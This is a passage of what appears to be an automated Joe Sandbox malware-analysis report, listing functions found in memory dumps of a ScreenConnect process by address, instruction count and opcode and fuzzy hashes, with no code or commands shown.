                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb02e8c722064a3cdc284aa640d99f4a9206463099068637b67c40694f4ac24b
                                                                                                                                                                                                                                                          • Instruction ID: e26f889dc75ad0e9eca3ef62bdfcfb4b51d3e09e7ed45249652e0469048d7999
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb02e8c722064a3cdc284aa640d99f4a9206463099068637b67c40694f4ac24b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A116A3190014D9FCF00EFA8D880ADDBBF2BF85718B18C959E009AF115D734A946CBA1
                                                                                                                                                                                                                                                          Function 015CCBB0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c86af02f0b0f237ce3c5f16ebe9a3b23295fc9333fffa2bc911a08f933d770c2
                                                                                                                                                                                                                                                          • Instruction ID: b54dbc9d3484a76169596f486d000d790cecaf6e259eb9db67e528ff4d3b53b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c86af02f0b0f237ce3c5f16ebe9a3b23295fc9333fffa2bc911a08f933d770c2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89112A31A0520C9FEF19DFA4D8557EDBBB2AF49710F105469D005BB2A0DA781D45CBA1
                                                                                                                                                                                                                                                          Function 015CECB1 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 35b227dc54192cfa1f0110cb0392edba42519d41ea7f0dab0998577a40955d5a
                                                                                                                                                                                                                                                          • Instruction ID: 31b35cf5889901b737068ada4fc9c35093d1c1ecf68959c6f2af88450b9b39ae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b227dc54192cfa1f0110cb0392edba42519d41ea7f0dab0998577a40955d5a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56116D71D003498FCB18DFACC8565ADBFB0FF05620F11865ED415EB2A2D7308641CB81
                                                                                                                                                                                                                                                          Function 015CF9E0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f9cb9653baae403ef7bb8952057586e17c033665c6c305e76040c29084b68d9d
                                                                                                                                                                                                                                                          • Instruction ID: 5a3544ab72caa1da4b2205db0e15ef5a6fa4d50a7c3b9382b02fc60c50bc6a25
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9cb9653baae403ef7bb8952057586e17c033665c6c305e76040c29084b68d9d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC0149327093455FC313DB69ECA195E7FF1EE8265030988EBE014CB262DE30AC0D9B91
                                                                                                                                                                                                                                                          Function 015C8AB0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c9538d6f66196d0cfbf8f3517dd6e02c6932f385b5e018ae9d716b397681b45d
                                                                                                                                                                                                                                                          • Instruction ID: f3c5af3e01ab5c9cb26dd4f55ea76fe3915d49df2d95f82d6a0423ace6a5d76f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9538d6f66196d0cfbf8f3517dd6e02c6932f385b5e018ae9d716b397681b45d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E11523690020ADFCF00DFA4D9409DEBBF5FF49314B108569E504BB250E771AE0ACBA0
                                                                                                                                                                                                                                                          Function 03CF4958 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d6f8e5046e18892c095490226e21d55ddccca2636e3dfa38216150fed95a54e6
                                                                                                                                                                                                                                                          • Instruction ID: 7529b352fb1b029b061d0e0aed2af3459f846462574c8aed88e4a7c9a79ece53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f8e5046e18892c095490226e21d55ddccca2636e3dfa38216150fed95a54e6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9017172300A0A2BC305E679A952A6EBBD6FFC4560710852DD91A8B340EF31DD059796
                                                                                                                                                                                                                                                          Function 015CA9C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0a7c88216868e7abe1ee7f6b8b7b28ed6024f33824546c4fec129e2c9bc9eb8f
                                                                                                                                                                                                                                                          • Instruction ID: 5e3e79899273038d5e53f11ad91d701d2077204971969560e3402fb365383998
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a7c88216868e7abe1ee7f6b8b7b28ed6024f33824546c4fec129e2c9bc9eb8f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101A271B003195F8B159E9DA8444AFBBE9FB84A64314896EE505DB301EFB1DD068BD0
                                                                                                                                                                                                                                                          Function 015C4EF8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 385985f119925ee7f448d03f46b8ccd3e12eeac9e2c6674f09394c983ede1422
                                                                                                                                                                                                                                                          • Instruction ID: 821bd16130ae96dd69a9fca453cd869f1703757f6daf102609ac24cac31532f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 385985f119925ee7f448d03f46b8ccd3e12eeac9e2c6674f09394c983ede1422
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF017B729083456FD716ABB8982579D3FE0EF87210F0108DFC046CB352D9348406979A
                                                                                                                                                                                                                                                          Function 015CBC60 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ce21710f42ebc8d670fd873274f5f3b4cc65900da40aa94a4b0efcfaf52eca1b
                                                                                                                                                                                                                                                          • Instruction ID: 3a0db5122e8993a9d9f4c7f9f7264db0b644b5c2aee3bb18075162cd60679ba1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce21710f42ebc8d670fd873274f5f3b4cc65900da40aa94a4b0efcfaf52eca1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D30144728496408FC3028BB8ECC72D8BBE0EE42621B4804AFC184CB202E67D154BCB82
                                                                                                                                                                                                                                                          Function 00FCD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 04e338efb6aa01ac80a9f1a6a6176e7956008b86845e14445710ffcfb7d1cf0f
                                                                                                                                                                                                                                                          • Instruction ID: da2b89a8350821f9f7c1f15718fe53aee7bc31fd94959ea442941ed35fcd38ee
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04e338efb6aa01ac80a9f1a6a6176e7956008b86845e14445710ffcfb7d1cf0f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8101F732448305ABE7204A29CE81F6BBBD8DF41334F18C02EED480B186C2799845EAB1
                                                                                                                                                                                                                                                          Function 00FCD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6e007eafa1694d54eb0df887dfaf58d50789d8efd25dfca072a2472477d9b523
                                                                                                                                                                                                                                                          • Instruction ID: bb65a84cc3e32723d476b38012134c4a4b8ecdbe988c07b0210130bb0f9882b0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e007eafa1694d54eb0df887dfaf58d50789d8efd25dfca072a2472477d9b523
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201406140E3C09FD7128B258D94B56BFB4DF53224F19C1DBD8888F1E7C2695849DB72
                                                                                                                                                                                                                                                          Function 03CF0C18 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b9d49ed54de9de1ebb43d1f2c7adfac32fcdc4c997a5cb4519097af5094a49b5
                                                                                                                                                                                                                                                          • Instruction ID: 697539f0371031d98bab8f0697a226e3739a1cab61ddf52c8dd31b695a44f604
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d49ed54de9de1ebb43d1f2c7adfac32fcdc4c997a5cb4519097af5094a49b5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF0AF6180E3D8AFDB03EF78E9601D87FB4DE43114B1640CBD084CB163EA200E09D79A
                                                                                                                                                                                                                                                          Function 03CF4500 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d01e7543df39077d8fc9e7541b76886c1adcebadb3c79008983de64944e71dd8
                                                                                                                                                                                                                                                          • Instruction ID: 5734974041ba8731cdc04c1688d2de7e93e7552b6216ee84a542fa6b7794703e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d01e7543df39077d8fc9e7541b76886c1adcebadb3c79008983de64944e71dd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14013676B0011A9FCF54EA9DD8009FFB7B9EF84211B00817BE919D7200E734EA1587E1
                                                                                                                                                                                                                                                          Function 015C8CF7 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e76e64386fa5dfa1d954e2bf5ce1f7f719cda3505e7449d1d95394831c5caa38
                                                                                                                                                                                                                                                          • Instruction ID: cdd633f6c380441241b6f5928c2bb9462809b5be2f4bb38f8eba206688efb32b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e76e64386fa5dfa1d954e2bf5ce1f7f719cda3505e7449d1d95394831c5caa38
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F0F4313043555FD711DB7CD880B5A7FE5EF866B0B0446A9E458CB295D731DC02C791
                                                                                                                                                                                                                                                          Function 015CF630 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 78df6d9edb42360c1c7d7189bc4aa6ba5e2bebd2ce8baafa56472dd5fce75155
                                                                                                                                                                                                                                                          • Instruction ID: 51af30c3fe70cb93411f7c35dbaedd84307025ff2b3902dd334febd59468d504
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78df6d9edb42360c1c7d7189bc4aa6ba5e2bebd2ce8baafa56472dd5fce75155
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91F0FC372042086FCF029FA8DC119DF3FABEF88360B144029F909D7251CB714C1197A5
                                                                                                                                                                                                                                                          Function 03CF44F0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cfb10b5807c2fa5beb47809bad7229ff30fe1d582de32079a0e9cf0ad3b225de
                                                                                                                                                                                                                                                          • Instruction ID: 35248718c9cd97978c74f0f11002d518fcc5e966419e1bc501981059470ba32f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfb10b5807c2fa5beb47809bad7229ff30fe1d582de32079a0e9cf0ad3b225de
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D67160425A9FCB55EBB9D800AFFBBB9EFC6200B04C1BBD815D7641EB349A05C7A1
                                                                                                                                                                                                                                                          Function 015C8B40 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7b12d48d0affc9aef210e2b7679e23c93a65e4e4a0db857b03ebbb5c4b07eb5b
                                                                                                                                                                                                                                                          • Instruction ID: 915eec82a7b43178c5c602e854a948769d564689b401aadbd266277a22583659
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b12d48d0affc9aef210e2b7679e23c93a65e4e4a0db857b03ebbb5c4b07eb5b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47012832D0125D9BCB04EFA9E8049CEFBB6FF89314F05842AE505BB250DB306916CBA0
                                                                                                                                                                                                                                                          Function 015CE610 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e84c3f4cef96a45401b0548faafe42a93e266ae4f023846d0f6e36209c71079b
                                                                                                                                                                                                                                                          • Instruction ID: a1d801f76a339a293505395ab5b2e9a6ba7278e69c8f71ad4db4348e4b86ed56
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e84c3f4cef96a45401b0548faafe42a93e266ae4f023846d0f6e36209c71079b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E34A092059FD745CFA8D855A1EBBB5EF86300B24C4AAE904CB292DB329D16D790
                                                                                                                                                                                                                                                          Function 015CBCC8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a8fb453ede5c76c7fffdf4c1b175a49dfd5a815b73b7debea0d1200ad8e0b377
                                                                                                                                                                                                                                                          • Instruction ID: 46d492069dba324601f71a2a858a639562d157a46d1c7bc355e4bca77021709e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8fb453ede5c76c7fffdf4c1b175a49dfd5a815b73b7debea0d1200ad8e0b377
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F08C37B0D2085FDB28CABEA401A9BBBDECBC4620B14C0BFE54DC3740E931A4008764
                                                                                                                                                                                                                                                          Function 03CF3F91 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fc0516f217673818e2a63af9a20eb91b75919ae083053171f271efd2c0daf0f8
                                                                                                                                                                                                                                                          • Instruction ID: 2245ee894b0953b31d7894c1969c0bca97df94170ce0dcffb3d0a5fb2b4e07fd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc0516f217673818e2a63af9a20eb91b75919ae083053171f271efd2c0daf0f8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F09032300204ABD714DAA8E940E5FB7EAEFC46B0B14852AF819DB394DBB1DE018794
                                                                                                                                                                                                                                                          Function 015C8D08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: de6243ef73da7d1401daef28e8828f0cf7ba9abf94ffeaac3ccda77b6c413984
                                                                                                                                                                                                                                                          • Instruction ID: 00f44c9cf52cb7577219c45ae042875ab46f55c1f0e18335d89236655b7f6bdd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de6243ef73da7d1401daef28e8828f0cf7ba9abf94ffeaac3ccda77b6c413984
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F05E323003196F9710DAADD840E5BB7E9EF846B4714852AF419CB390DB71ED4187A4
                                                                                                                                                                                                                                                          Function 015CFA08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2a4a99531663aae38f1460f76fdb015f3a0965be443bf5750182cbc2562f2a85
                                                                                                                                                                                                                                                          • Instruction ID: bd040700fdc03468560df21c6ad1704782c29bcc709a497eea849dfa55bd050b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a4a99531663aae38f1460f76fdb015f3a0965be443bf5750182cbc2562f2a85
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFF05E71704706AB93119A9EB890A5FB7DAEAC4E60304C42EE619CB300DE71EC0947D5
                                                                                                                                                                                                                                                          Function 015CBCB9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ffd6a1afa1c558939043325709cee192ce850f8e4002cd8ac25ea4efceb33eea
                                                                                                                                                                                                                                                          • Instruction ID: 86cde6c0cdee7eb0360f941e081bc737eb2d22c76833ae7cdc26fb81a72b7997
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffd6a1afa1c558939043325709cee192ce850f8e4002cd8ac25ea4efceb33eea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F02033A0E2401FC729CBBE98029AB7FE9CF81210B0882BFD40CD3A40D92498018720
                                                                                                                                                                                                                                                          Function 03CF2EB0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
